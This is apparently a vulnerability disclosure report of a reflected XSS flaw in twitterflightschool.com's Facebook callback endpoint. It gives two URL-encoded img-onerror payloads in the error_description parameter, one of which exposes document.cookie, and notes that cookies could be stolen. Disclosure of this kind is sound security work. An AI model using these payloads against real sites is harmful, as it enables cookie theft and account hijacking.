Reflected XSS in twitterflightschool.com

While testing twitterflightschool.com, I came across the below endpoint: https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description= I noticed that it is possible to inject JS payload in "error_description=" parameter and trigger XSS in twitterflightschool.com Reproduction Steps: ============== Here we go https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.cookie%29%3E ## Impact This is will allow the attacker to steal users cookies